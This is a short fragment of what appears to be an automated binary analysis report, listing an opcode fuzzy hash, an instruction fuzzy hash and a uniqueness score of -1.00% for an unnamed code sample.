                        • Opcode Fuzzy Hash: 5b147aff4b10d651f4ceec80f303942da5f950dc06aa6b0fc585759805665184
                        • Instruction Fuzzy Hash: D70128368013058ACF349F25C454AAEB3B5AF14315F55893FE482BB7D2CB38D9A1CE1A
                        Uniqueness

                        Uniqueness Score: -1.00%